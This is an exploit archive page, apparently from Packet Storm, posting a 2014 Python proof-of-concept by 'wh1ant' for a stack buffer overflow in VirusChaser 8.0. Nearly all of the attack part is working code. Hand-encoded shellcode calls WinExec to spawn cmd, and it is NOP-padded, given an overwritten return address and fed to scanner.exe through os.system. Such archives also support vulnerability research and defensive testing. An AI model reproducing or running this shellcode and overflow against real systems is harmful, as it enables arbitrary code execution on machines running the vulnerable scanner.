exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VirusChaser 8.0 Buffer Overflow

VirusChaser 8.0 Buffer Overflow
Posted Mar 26, 2014
Authored by wh1ant

VirusChaser version 8.0 stack buffer overflow exploit.

tags | exploit, overflow
SHA-256 | 6ecbff68b7197ddb88d7ad80fa57db0def9d0748f4668c04b41b49f4bea3101e

VirusChaser 8.0 Buffer Overflow

Change Mirror Download
# Exploit Title: VirusChaser 8.0 - Stack Buffer Overflow
# Date: 2014/03/26
# Exploit Author: wh1ant
# Vendor Homepage: https://www.viruschaser.com/
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
# Version: 8.0
# Tested on: Windows 7 ultimate K
#
# You must have administrator permission to run

from struct import pack
import os

shellcode = "\x66\x83\xc4\x10" # add esp, 0x10
shellcode += "\xb8\x50\x70\x50\x50" # mov eax, 0x50507050
shellcode += "\xb9\x4e\x7d\x04\x27" # mov ecx, 0x27047d4e
shellcode += "\x03\xc1" # add eax, ecx ; WinExec() address
shellcode += "\x68\x63\x6d\x64\x01" # push 0x01646D63
shellcode += "\x66\xb9\x50\x50" # add cx, 0x5050
shellcode += "\x66\x81\xc1\xb0\xaf" # add cx, 0xafb0
shellcode += "\x88\x4c\x24\x03" # mov [esp+3], cl
shellcode += "\x8b\xd4" # mov edx, esp
shellcode += "\x66\x51" # push cx
shellcode += "\x41" # inc cx
shellcode += "\x66\x51" # push cx
shellcode += "\x52" # push edx
shellcode += "\x50" # push eax
shellcode += "\x50" # push eax
shellcode += "\xc3\x90" # retn ; WinExec()

# BOF retn: 0x0040753d

pay = shellcode
pay = pay.rjust(520, "\x90")
pay += "\x9c\xdb\x12"

os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"")

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close